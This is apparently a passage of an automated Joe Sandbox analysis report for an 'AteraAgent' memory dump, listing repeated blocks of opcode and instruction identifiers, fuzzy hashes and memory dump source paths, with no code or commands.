                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 22de3ddc54ebeccc1d4f832c4b965561fb203b693a83595ebb97426a0cf3c80a
                                                                                                                                                                                                                                                                            • Instruction ID: 91c52c1ef947cf2740ad9f638ce459bf7c3a9284f523fdb3e86ac2573982798d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22de3ddc54ebeccc1d4f832c4b965561fb203b693a83595ebb97426a0cf3c80a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32418F31A18A0D8FDB98DF1884556BA37E1FFA9340F10416AE40ED3695CE35A84687C1
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b72d4dca03f37a66d502fba1781f5e71d3cbc7a58fd3ae09c0535e4be53121e5
                                                                                                                                                                                                                                                                            • Instruction ID: 00cc09ce43c5d411538cb7551aa6b10da4dc54a725a169b944c33f6e12734fb5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b72d4dca03f37a66d502fba1781f5e71d3cbc7a58fd3ae09c0535e4be53121e5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80413D70D0961D8FDB49EB68C464BBDBBB1EF56341F6400AED00DE72A2CB381985CB61
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3292091e957b8bbc1e2ebd1b77081defffbc0ae489ed1f30d73e2be5af8989a5
                                                                                                                                                                                                                                                                            • Instruction ID: e93198285f3c8d688d28474a5daa110bcbf17935d8e623ee35f48c7859c392b4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3292091e957b8bbc1e2ebd1b77081defffbc0ae489ed1f30d73e2be5af8989a5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4331F47181DB888FDB18AF589C0A5E9BFF4EF9A310F04016FE489D3152D661B94887C3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fd7e266da9e17ab02f2742f748733896f8c8dfce1d2de742100d56509c6fbd2f
                                                                                                                                                                                                                                                                            • Instruction ID: ed37d39e4aac0ccfd523436d6716e893e52aa6c7a19a449e1924457602cebd9f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd7e266da9e17ab02f2742f748733896f8c8dfce1d2de742100d56509c6fbd2f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6531AA7150EBC68FD7578B2898606907FF0EF07254B1A44DBC489CF1B7E6689C4AC7A2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0e37349b742da4386292c78d330cb88e0b146eb7d9a98cae586bb89623673145
                                                                                                                                                                                                                                                                            • Instruction ID: d468852c0dfe4b1fca63834525e14240108de8b77c4b6d4a6923806c88aa4237
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e37349b742da4386292c78d330cb88e0b146eb7d9a98cae586bb89623673145
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2021D172A19E1C8FEB94EB5CA498BE977E1FB99350F0441B6E40DC72A5CE209C4587C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0cd7ad79583470cad330bf9b8bd69469ff633152289696a74bf079df181a302c
                                                                                                                                                                                                                                                                            • Instruction ID: fb757c4a0c04dfd79c51725c42c195171f37e6add5160823e88cf656f53e1607
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd7ad79583470cad330bf9b8bd69469ff633152289696a74bf079df181a302c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04217033B0EA55CBE664867D78910B87FC1DF862A470842BBD50CC71A3D8064C46C3C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0ed658cc10d93ffe5a14b1d9228f653aa6cb98ddc38ff5e909491944bf1f8858
                                                                                                                                                                                                                                                                            • Instruction ID: d71ad76879da41d7a30ac33c399556ba9fd3651916a679410ae40aa58662f658
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ed658cc10d93ffe5a14b1d9228f653aa6cb98ddc38ff5e909491944bf1f8858
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31C761B1E78A9FE345A778C4226BDBFB1EF56340F5441FAD00DCB2A3CD19184587A2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 85d045c83c0ca9ed860b592fb102af70d0876d0c7f1eb38734eb43f3bfd03d1c
                                                                                                                                                                                                                                                                            • Instruction ID: d7cf76596e27bfc1ab37a2a7d10b1af8a1a5bfdef63eba5d64804e53d9495909
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85d045c83c0ca9ed860b592fb102af70d0876d0c7f1eb38734eb43f3bfd03d1c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C121AE30A1DA1C8FEB88DF4C94417BC77E1EF99751F04427ED04ED32A1CE24A8458781
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 23ce95f71b551e680ef21751c6d0c99ca6ec4e6a70ad4a544c0e604a596ce8e0
                                                                                                                                                                                                                                                                            • Instruction ID: 46b60b7600e751b4470db1ac9374f6033af7472c3a5aa9821aee20dc343076be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23ce95f71b551e680ef21751c6d0c99ca6ec4e6a70ad4a544c0e604a596ce8e0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0321C447A0E6D55FE251B7BCB8A54F96FE0EFD626570941F7E08DCA0A3DC081C4E8292
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 97f65ac7863788bbf1e657074209f1fd1be7636d8cb7fb19ca6f9a57f2168d2c
                                                                                                                                                                                                                                                                            • Instruction ID: 9932ed2e1c3086e7fc06ea3e3394eea3cc3fac8b40f8f7abf0cb427214f82163
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f65ac7863788bbf1e657074209f1fd1be7636d8cb7fb19ca6f9a57f2168d2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7531A47190AB8CCFDB42DB68C4505ADBFF1FF57340F1401AAD008DB2A2CA359945C7A1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c4fca5a09fcbae2713c149bcda9370e44298ebf21dbca2ef5efafaeca66e7134
                                                                                                                                                                                                                                                                            • Instruction ID: a465fbad8885343d66307c1c54068fa1e5b364ce43462204e99ab189db68e89a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4fca5a09fcbae2713c149bcda9370e44298ebf21dbca2ef5efafaeca66e7134
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B631C22194E7C54FE7579B7488295753FE2AF53250B0980FBC48DCB1E3D919680AC3A2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 26afb01f49d8c31a9c9ede3c95c404473a9b76c9fe7cf1e44b881f0f3765818c
                                                                                                                                                                                                                                                                            • Instruction ID: 2ae8847232c0cc36fac6820a249883ce252bc3d02e07bb64d3e229243ef8e514
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26afb01f49d8c31a9c9ede3c95c404473a9b76c9fe7cf1e44b881f0f3765818c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF218370C09A5D8FDB85EF68C8556EDBBF0FF6A300F1401AAD409E7291CA349845CB91
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4ef1c7f1d377c2f580e6b9232b42e395da395d14eba4f9c11c71d03ed33b02a1
                                                                                                                                                                                                                                                                            • Instruction ID: d1bde95f7fef4bf2740db8f2301316312fc128ec1abea12ba6e3e4646d42235a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef1c7f1d377c2f580e6b9232b42e395da395d14eba4f9c11c71d03ed33b02a1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91318171A0AB4CDFDB42DB78C440AAD7FF1EF97340F6441AAD048DB292CA35A945C7A1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 905ed9a5d02cfbf662760e0d29e8afcdd9fece0948f9ece30cc25a91cfb49453
                                                                                                                                                                                                                                                                            • Instruction ID: 61e4d3d14ba33e7f53ef97ee6401df6c0090a9f552184bcb42fc9656d31e4959
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905ed9a5d02cfbf662760e0d29e8afcdd9fece0948f9ece30cc25a91cfb49453
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C621F9A2C0EBCC9FE3059BA85801179BBA0EF47344F5441BBE04CC74E3E9259998C3C6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b09e100ae9c452d6d16b9e8509567d9bf67a61297cf9c9676854f98b7a5d00fd
                                                                                                                                                                                                                                                                            • Instruction ID: 2bd6f7d40ec616148eebd895c21f70bef88f8d51ef949f9be8adf740d50ae65b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b09e100ae9c452d6d16b9e8509567d9bf67a61297cf9c9676854f98b7a5d00fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE21F73150E546DFDB55EB38C0859A67F91DF66310B2486FAD10CCF1A7D928A89AC3C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1ebeb4ed921c89504747e5d21d6b082fbc719591e4448c10497a7009cf843fb4
                                                                                                                                                                                                                                                                            • Instruction ID: 07fe214604feca31ab378fb5d6eb2b12a71d47b3d7d7c2362074b6a8c0d0e945
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ebeb4ed921c89504747e5d21d6b082fbc719591e4448c10497a7009cf843fb4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B214C2191DF868FD399DB28C8665B1BBF1FF5530074845FAC049C71A3DE28D8098741
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ce6cc6f33d6acca569afbfdfb7ac1b2ac448454ee05194b5db1d084f55eaf49b
                                                                                                                                                                                                                                                                            • Instruction ID: a3355ae21390cd96abfe17577f8e1fb7f0d3e1c6b58c8220f8289fac4d7ed89b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce6cc6f33d6acca569afbfdfb7ac1b2ac448454ee05194b5db1d084f55eaf49b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F11E926A5EF898FF75A933858612B52BD1EF57260F0901ABD08CC7197DD495889C3C2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 21ee589a8d46a465e26217937f1bbb74e98b6ec65bc08ee58bd002383e807392
                                                                                                                                                                                                                                                                            • Instruction ID: ec5dd6d918ca57e15c5f27de14a18e177f2957806731b99e5f25c69fbad3040c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21ee589a8d46a465e26217937f1bbb74e98b6ec65bc08ee58bd002383e807392
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA11E922F2EE498FF7D8826D2CAA1753AC3DB9564470541BAE44CC32A7DD218C45C6C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ce51ecf9a3b8dd0462d019ba823afb883624c5f7d857313ab2eac1eef936c85a
                                                                                                                                                                                                                                                                            • Instruction ID: eed65c86be1fa933611e7ed6a98df09c83db6a411def132f50b042d4a85cd5b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce51ecf9a3b8dd0462d019ba823afb883624c5f7d857313ab2eac1eef936c85a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0113A7150E7C49FD3079B288865951BFF0AF6720574941EFE088CF1B3C529994AC762
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b1e9140b9c1b02da986d3819835dc787eef3ec76643ae7e9704f22044e010182
                                                                                                                                                                                                                                                                            • Instruction ID: c996266adf734259f986aacdb66a054069ea5a1f5f759139ac33eef9f55af795
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1e9140b9c1b02da986d3819835dc787eef3ec76643ae7e9704f22044e010182
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F115E70518B489FE7789F28C80DBB777E5EBA9311F00452EA48DC3262EE3068458782
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3948d7d4fbb998fd528803ffa9db39bec6a4f88e400f5e60dea20587f79b9281
                                                                                                                                                                                                                                                                            • Instruction ID: f819e1ca15d26cdc864be8fdfaac7adbfdffc049702ca65f3d3d30bf83e98324
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3948d7d4fbb998fd528803ffa9db39bec6a4f88e400f5e60dea20587f79b9281
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E016672A1AF8D9FF358AB2CC8751FDBF90EF46251F0400B6D05CC31B2D92028098782
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6c866dc47c7a58af0cad1a006fa0b85c4966797af125b855396175301c414024
                                                                                                                                                                                                                                                                            • Instruction ID: ab555258aa8b27d24038ced038437a547d2dde4e90453c47b76681f6e0f1b5c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c866dc47c7a58af0cad1a006fa0b85c4966797af125b855396175301c414024
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C01AF72B0DD1C8FE6D8EA1DE899A7437E2EBA936031405E7D44DC7662E912EC428781
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f4351cffc3511adce6a810565a582695fe70e10090b582280f3e78ee0472b343
                                                                                                                                                                                                                                                                            • Instruction ID: d789892ff8ee1c01a0b80c0021ac6d893c735d465e1de4785efb67438740d4ff
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4351cffc3511adce6a810565a582695fe70e10090b582280f3e78ee0472b343
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C01263284E3C99FD302AB3098620E5BFA4DF07244F0841AAE04CCB1A3C959164EC392
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            • Opcode ID: 3344147a8b46155937bdb58a58e502715520c44d76804c586f9729daa9e7a0ea
                                                                                                                                                                                                                                                                            • Instruction ID: e283693751ad96dc29f03bfb7cbc418966e7e1c83049dd6f3d47f12ab94fafc9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3344147a8b46155937bdb58a58e502715520c44d76804c586f9729daa9e7a0ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2101A76180D7C9AFE746A778C8652ED7FB0EF47240F5501F7D048CB0B3DA2819498352
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cec2a30eee26e9b806bb8e21659e3cfc76865a025d8c0c7a14c1fd5aa2ae5dec
